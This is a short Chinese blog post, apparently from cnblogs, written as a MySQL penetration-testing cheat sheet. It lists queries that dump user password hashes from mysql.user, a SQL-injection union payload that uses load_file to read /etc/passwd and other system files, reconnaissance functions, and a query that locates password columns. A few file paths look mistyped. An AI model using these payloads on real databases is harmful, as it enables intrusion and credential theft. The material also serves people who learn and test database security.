• mysql 漏洞利用与提权


    判断MySQL服务运行的权限

    1、查看系统账号,如果出现MySQL这类用户,意味着系统可能出现了降权。

    2、看mysqld运行的priority值。

    3、查看端口是否可外联。

    MySQL密码获取与破解

    1、获取网站数据库账号和密码

    2、获取MySQL数据库user表

    用户一共有三个文件,即user.frm、user.MYD、user.MYI,MySQL数据库用户密码都保存在user.MYD文件中,包括root用户和其他用户密码。

    MySQL密码查询

    select user,password from mysql.user;

    select user,password from mysql.user where user = 'root';

    mysql 渗透技巧

    如果发现一个PHP的SQL 注入点,可以通过构造"-1 union select 1,1,1,1,1,load_file('/etc/passwd')"

    直接读取的配置文件的命令如下

    select load_file('/etc/passwd')

    select load_file('/etc/issues')

    select load_file('/etc/etc/rc.local')

    一些常见的MySQL命令

    show databases;

    use testdatabases; 使用某个数据库

    show tables;

    select * from a 查询a表中所有的数据

    select @@datadir;  查询数据库的路径

    select @@basedir  查询mysql的安装路径

    常用内置函数

    select system_user() 查询系统

    select current_user() 查询用户

    select user() 查询用户

    select version() 查询数据库版本

    select database() 查询当前连接的数据库

    select @@version_compile_os查询当前操作系统

    select now() 显示当前时间

    快速定位数据库中涉及的密码表

    select table_schema,table_name,column_name from information_schema.columns where column_name like ‘%password%’;

  • 相关阅读:
    hdu 1427 速算24点
    HDFS Safemode问题
    surfaceDestroyed什么时候被调用
    C# DataTable的詳細使用方法
    HDU 2460 Network(双连通+树链剖分+线段树)
    撰写架构设计文档的心得体会
    win7下jdk安装环境变量配置
    Android提高第二篇之SurfaceView的基本使用
    UVa 490
    bnu 34982 Beautiful Garden(暴力)
  • 原文地址:https://www.cnblogs.com/linuxsec/p/11179582.html
走看看 - 开发者的网上家园